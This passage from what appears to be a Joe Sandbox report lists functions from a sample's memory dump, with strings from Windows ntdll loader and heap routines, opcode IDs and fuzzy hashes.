                                                      • Instruction Fuzzy Hash: C841F1B1951312ABD721EB69DC44B6B7BE8FF84750F04482EF944D7294E7B0D800CB92
                                                      Function 0169C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • PreferredUILanguages, xrefs: 0169C212
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0169C1C5
                                                      • @, xrefs: 0169C1F1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: a0782d5b13be4c930e6a9ff18483f136d8b49ee825d76376810693e5169489f7
                                                      • Instruction ID: 19217f2aa71fb92fe1f2e7b44072de2221966e8ff4fe4fc5a50828ebd235197c
                                                      • Opcode Fuzzy Hash: a0782d5b13be4c930e6a9ff18483f136d8b49ee825d76376810693e5169489f7
                                                      • Instruction Fuzzy Hash: C3416271E0021AABDF11DBD8CC91BEEBBBDAB55704F1480AAE605A7280D7749A45CB50
                                                      Function 01674144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: 29a502374bb8e4595265a6dcdfdd28cfc8944a2deaea5ec9bec42be052d81f15
                                                      • Instruction ID: ae0f8125a869d6e12aafd7f5d587b22727661f617763eac4ae6e3dc12d011a9b
                                                      • Opcode Fuzzy Hash: 29a502374bb8e4595265a6dcdfdd28cfc8944a2deaea5ec9bec42be052d81f15
                                                      • Instruction Fuzzy Hash: 99410231A006498FEB26DBD9DC48BADBBB9FF95340F14045ADA11EF791DB358901CB10
                                                      Function 01664755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01664899
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01664888
                                                      • LdrpCheckRedirection, xrefs: 0166488F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                                                      • Instruction ID: 3f32c0e1e4fbdbfc9568f0a73c85dba48647fb69d96aeff8c652237d210d989a
                                                      • Opcode Fuzzy Hash: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                                                      • Instruction Fuzzy Hash: CE41D132A056519FCB21CE6CDD40A66BFEDBF8AA90F06056DED49DB351DB30E810CB91
                                                      Function 015F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-2558761708
                                                      • Opcode ID: 98137fd8dbcaed7430a45e0dec2b4229c355be35b74d6953419ff7efcafecf9a
                                                      • Instruction ID: edec4bd886d69d717e68050bf911d0c08b41dd24faff41bc7178fd3516b5807f
                                                      • Opcode Fuzzy Hash: 98137fd8dbcaed7430a45e0dec2b4229c355be35b74d6953419ff7efcafecf9a
                                                      • Instruction Fuzzy Hash: 5411CD313161469FDB29DB18C880B6AB3A6BF41716F18811EF506CF292DB34D841C755
                                                      Function 016620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializationFailure, xrefs: 016620FA
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01662104
                                                      • Process initialization failed with status 0x%08lx, xrefs: 016620F3
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: 0eebcae3bbd4cc579519f9c5b36a75e800991c482bdf7f0e8967108b138fcb97
                                                      • Instruction ID: d9082f9d4f9c2188f169eb67b4e6f25619514b0ed4b71c8f4e23aefca54c6ea5
                                                      • Opcode Fuzzy Hash: 0eebcae3bbd4cc579519f9c5b36a75e800991c482bdf7f0e8967108b138fcb97
                                                      • Instruction Fuzzy Hash: BBF02274A40708AFE724EA8CCC56FAA776DFB40B04F10002CFB007B781D3B0A950CA85
                                                      Function 015F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      • Opcode ID: 3ae29b5f43475a23d5456f818ff08b8298617ecd7366ad7d44513613fc9885bd
                                                      • Instruction ID: 7bd550ca02dab0cc54ba21c4ad67ac2d668612d22a00aee80e8b1aa4a079c537
                                                      • Opcode Fuzzy Hash: 3ae29b5f43475a23d5456f818ff08b8298617ecd7366ad7d44513613fc9885bd
                                                      • Instruction Fuzzy Hash: A1713B71A0014A9FDB01DFA8CD95BAEB7F9BF48744F144069EA05EB291EB34ED01CB64
                                                      Function 015EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrResSearchResource Exit, xrefs: 015EAA25
                                                      • LdrResSearchResource Enter, xrefs: 015EAA13
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      • API String ID: 0-4066393604
                                                      • Opcode ID: 78bd5bad2d1a025b74a95886f6705c0cc35b603d961758d1ac68e3a7bcf0ec20
                                                      • Instruction ID: b7e6b71722a7ba112a3138e17513a0d6fb45970f523017c4f68417e1c90aa102
                                                      • Opcode Fuzzy Hash: 78bd5bad2d1a025b74a95886f6705c0cc35b603d961758d1ac68e3a7bcf0ec20
                                                      • Instruction Fuzzy Hash: ECE17071E002199BEF268FA9DD88BAEBBF9BF54310F104529F901EB351D7749941CB50
                                                      Function 016AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction ID: a698c2c5862afa5a4a5d6c68120d0806c8aee6c4c55a1dfe6510da5f284cc184
                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction Fuzzy Hash: 7EC1BE312043429BE725CF68CC41B6BBBE6AFC4318F484A2EF6968B291D774D905CF55
                                                      Function 0165E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 6ff4604b60a1b9b26c718f1416920137afbb5519c000328c03058dc0b669530c
                                                      • Instruction ID: fab33ac51e98d38f9c8150a5bc9c232732f845c3be453a0f92c2bf6239fbf219
                                                      • Opcode Fuzzy Hash: 6ff4604b60a1b9b26c718f1416920137afbb5519c000328c03058dc0b669530c
                                                      • Instruction Fuzzy Hash: 45616C72E006199FDF54DFA88D80BADFBB5FB48700F15406EEA49EB241D732AA00CB50
                                                      Function 016843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      • API String ID: 0-17815947
                                                      • Opcode ID: bf0ed8d15235f81f2f4f51612c9f9d980436b485a5375accca91b1209a5b7cf9
                                                      • Instruction ID: 5d3890d03d3bf9ab7bfa470e6e4366a162db0a8575b38d4b5b8aec26540c485f
                                                      • Opcode Fuzzy Hash: bf0ed8d15235f81f2f4f51612c9f9d980436b485a5375accca91b1209a5b7cf9
                                                      • Instruction Fuzzy Hash: B051F771E4061EAEDF11DFA9CC90BEEBBB9FB58754F100629E611B7290DB309905CB60
                                                      Function 015E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • kLsE, xrefs: 015E0540
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015E063D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      • Opcode ID: 0d9a80e11528e64fa055cdaf855a6463cee4ed8f5993f5ac7de1e28c6dbcd953
                                                      • Instruction ID: 5f70e8b770cf9fda9721c06aa55b128ff9609da5bce332dea9a4654e61df063f
                                                      • Opcode Fuzzy Hash: 0d9a80e11528e64fa055cdaf855a6463cee4ed8f5993f5ac7de1e28c6dbcd953
                                                      • Instruction Fuzzy Hash: 1951A171A047429BD728DF68C4487A7B7E4BF84304F10483EE5DA8B281E7B0D545CF91
                                                      Function 015EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 015EA309
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 015EA2FB
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      • Opcode ID: 4a3aa21c822c701ea33b33b2bd36c9b4003dcaf4de08a1c9eca4aeee17a67ebe
                                                      • Instruction ID: 588feb8dce0be5d4cfe5c92a5275bf9e022bae34ccc90e30ce76bb6ee31257d4
                                                      • Opcode Fuzzy Hash: 4a3aa21c822c701ea33b33b2bd36c9b4003dcaf4de08a1c9eca4aeee17a67ebe
                                                      • Instruction Fuzzy Hash: 07419930A00646DBEB19CF69D894B6ABBF4BF88304F2444A9E914DF391E3B5D900CB50
                                                      Function 0161A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      • Opcode ID: 29068fbe04ff6f1c0c96588e75589d5719f72b1e609a3be41ce65f33098fde6c
                                                      • Instruction ID: 28a8472b74ada99cd9dafe54866eed19cf896df9be8f522fead069b3a40b4dd5
                                                      • Opcode Fuzzy Hash: 29068fbe04ff6f1c0c96588e75589d5719f72b1e609a3be41ce65f33098fde6c
                                                      • Instruction Fuzzy Hash: A70121B2215780AFD311CF54CD45B1677E8E784725F08883DE608CB180E370E800CB8A
                                                      Function 015EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      • Opcode ID: 82d7dbb86b9363305b4e0baaba3a1bafefcee2af49c6e2ffd67228dbacf2d492
                                                      • Instruction ID: ea8d2245197a0a4b8cb89f8cda163a957709eb4a2c61efeabba538fc318dbc9e
                                                      • Opcode Fuzzy Hash: 82d7dbb86b9363305b4e0baaba3a1bafefcee2af49c6e2ffd67228dbacf2d492
                                                      • Instruction Fuzzy Hash: 12826975E002198FEB29CFA9C988BEDBBF5BF48310F148169E919AF390D7709941CB50
                                                      Function 01666420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: c81a61c96b46af231eb3949a5e1ba489ffa365e84bc87adb7d995f8cfb8e098d
                                                      • Instruction ID: 74193e67bd0a75c1f3bb65795b744327bd47bab3c6542fdf93d503cb6f69753c
                                                      • Opcode Fuzzy Hash: c81a61c96b46af231eb3949a5e1ba489ffa365e84bc87adb7d995f8cfb8e098d
                                                      • Instruction Fuzzy Hash: 14918371A0061AAFEB25DF95DC85FAEBBB9EF48750F100059F600AB290D774AD00CBA4
                                                      Function 0168E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: b37fef2207ecf65e6a8bf88dd5df178d830876dddc23eb133c21543347899400
                                                      • Instruction ID: 2a762aa1f0299d6bf19c1c64b289334228824b9d1481583099bbd7e18553bb20
                                                      • Opcode Fuzzy Hash: b37fef2207ecf65e6a8bf88dd5df178d830876dddc23eb133c21543347899400
                                                      • Instruction Fuzzy Hash: 0191A13190161ABFDB22AFA5DC54FAFBB7AFF85750F100129F601A7250DB769902CB50
                                                      Function 0161A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • Opcode ID: d622fb05402c001f5565d46ccede13ef190a2324a3c2e069c1b161ebe5b47d70
                                                      • Instruction ID: 9e43fd968f3b38f26805cb1c028017beb5a2eb1d83f0f34816599cfcf0873f68
                                                      • Opcode Fuzzy Hash: d622fb05402c001f5565d46ccede13ef190a2324a3c2e069c1b161ebe5b47d70
                                                      • Instruction Fuzzy Hash: 37716EB5E0021A9FDF68CF9CD9906ADBBB2BF48710F54816EE906A7341E7309941CB64
                                                      Function 01684978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      • Opcode ID: f45c569fe08073ea61e672979d7db9322961094cf621b9a02078f797f0cc20a6
                                                      • Instruction ID: ea22d83d5b9948412ec1bb8ff19b2b0f2ee4f38414ed7e68e7211f989f67d399
                                                      • Opcode Fuzzy Hash: f45c569fe08073ea61e672979d7db9322961094cf621b9a02078f797f0cc20a6
                                                      • Instruction Fuzzy Hash: EE517372D00227DBDB14EF99DC44BAEBBB4BF54A14F05426AE911BB344DB349801CBA4
                                                      Function 015FE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: dca05a85d87ff682b0a018ec3dabf4c538790d2aa533efead76819117e0c69b5
                                                      • Instruction ID: e40c00b5accbe056d58f4fb6636a3f8233e5cc5ea235071c0c2c09c056ab08bb
                                                      • Opcode Fuzzy Hash: dca05a85d87ff682b0a018ec3dabf4c538790d2aa533efead76819117e0c69b5
                                                      • Instruction Fuzzy Hash: 67418F725093429BD721DA69C881B6FBBE8FF88714F05092DFA84EB190E674D904C796
                                                      Function 0165C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: b885ef73176134d5f7d5426f2a9b816b29479028ead5de513a8ef93f01add986
                                                      • Instruction ID: be9b5ba05b3aa4a01af1978532e7c72df404598f09ecc18bf589a78dda2e6169
                                                      • Opcode Fuzzy Hash: b885ef73176134d5f7d5426f2a9b816b29479028ead5de513a8ef93f01add986
                                                      • Instruction Fuzzy Hash: BF4145B1D0062DAADB61DA50CC84FDEBB7DAB45714F0145E9EA08AB140DB709E89CF98
                                                      Function 01676B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 5fa72bfc109f8a930add28f78caee9d284509800d4c0708cc63939daef4078e2
                                                      • Instruction ID: 95c938db31272f0ff3c062d5cc87de7dd514c3d63dc11f7132eb55d1ee213913
                                                      • Opcode Fuzzy Hash: 5fa72bfc109f8a930add28f78caee9d284509800d4c0708cc63939daef4078e2
                                                      • Instruction Fuzzy Hash: 9C31F431E00B199AFB22DB69CC50BEE7BA8EF45704F14406CEA41AB282DB75D845CB54
                                                      Function 0165CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: 86b5cad2ba512d7d9147c454c1b38d16364b342da05156b2e287eaadb7ab954d
                                                      • Instruction ID: 7b73bf7b50ea60f5dd78ab7441efd0810a16626dba306ec77fbb23b5e5b13882
                                                      • Opcode Fuzzy Hash: 86b5cad2ba512d7d9147c454c1b38d16364b342da05156b2e287eaadb7ab954d
                                                      • Instruction Fuzzy Hash: 2631F53690061AAFEB15DB59CC55E6FBB78EF80720F014169ED05AB250D7309E04DBE0
                                                      Function 0166892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0166895E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      • Opcode ID: e0d0be358e7ab3ddd5cbcf53c628fdae525fdd80439d6d5c0929d806cdbbd25d
                                                      • Instruction ID: 390a3da6c22c826e811ae8f2090ce64c312b418078e1697920118b828a05dd09
                                                      • Opcode Fuzzy Hash: e0d0be358e7ab3ddd5cbcf53c628fdae525fdd80439d6d5c0929d806cdbbd25d
                                                      • Instruction Fuzzy Hash: CB01F731A11302AFE7345F7DCC84A567B6DFFD5695B04121CF64207651CB606845C796
                                                      Function 01682000 Relevance: .8, Instructions: 757COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7de50df338917808d594de811c01b2f4d12b07204027c8cadf23585278df154
                                                      • Instruction ID: d7607d9bcd57a3d8ee54f91dc5f92c65868d584ecac707ddb12a2dd6e720d297
                                                      • Opcode Fuzzy Hash: a7de50df338917808d594de811c01b2f4d12b07204027c8cadf23585278df154
                                                      • Instruction Fuzzy Hash: 8442D2716083419FDB25EF68CCA0A6BBBE5BF88700F594A2DFA8297350D770D845CB52
                                                      Function 01678158 Relevance: .6, Instructions: 617COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 151ac685530c493c5b7e0341a6d8a8b0902380ee285330a0aabbf87aee957bd6
                                                      • Instruction ID: 169677a04672e7e3b064d61c524ecb7ee86626459c967f6b48272bf66c61c3e1
                                                      • Opcode Fuzzy Hash: 151ac685530c493c5b7e0341a6d8a8b0902380ee285330a0aabbf87aee957bd6
                                                      • Instruction Fuzzy Hash: 2A425C71E002199FEB25CF69CC45BADBBF9BF88310F158099E949AB242D7349D81CF50
                                                      Function 015F2840 Relevance: .6, Instructions: 605COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2032621169ac28149090f07757d627277775bb57faad19ef42f957c73c3946a
                                                      • Instruction ID: e42e0bedc694bf2b16e5ef3550ff83e99b02623c275d8bc0686409d8a4cf059d
                                                      • Opcode Fuzzy Hash: c2032621169ac28149090f07757d627277775bb57faad19ef42f957c73c3946a
                                                      • Instruction Fuzzy Hash: 9632BAB0A006568FEB29CF69CC447BEBBF2BF86304F24811DD5869B785D735A842CB50
                                                      Function 0168A118 Relevance: .6, Instructions: 591COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 837b4430c3e538ebe26902c3573c4df6517218bdae45b12b18c1360b7e3c36a3
                                                      • Instruction ID: e026c2fc2e2c7d5dc1a3bea71a7f3f58011435476769fe6eb5832c7af19df7df
                                                      • Opcode Fuzzy Hash: 837b4430c3e538ebe26902c3573c4df6517218bdae45b12b18c1360b7e3c36a3
                                                      • Instruction Fuzzy Hash: EA22C1742046618BEB25EFADC850372BBF1AF44304F08865BDD868F386E775E492DB61
                                                      Function 015E6A50 Relevance: .5, Instructions: 548COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1a1cc927fdab34a1ce08c93c261e9ecb1ac4fc5c88004046acee0c495235b070
                                                      • Instruction ID: 28eae9194aed1cef20b39661661fc30a0505afd59166cad6acac8faff8ab260a
                                                      • Opcode Fuzzy Hash: 1a1cc927fdab34a1ce08c93c261e9ecb1ac4fc5c88004046acee0c495235b070
                                                      • Instruction Fuzzy Hash: E4328C71E01215CFDB29CF68C884AAEBBF2FF58310F148569E956AB391D774E881CB50
                                                      Function 01604A35 Relevance: .4, Instructions: 423COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
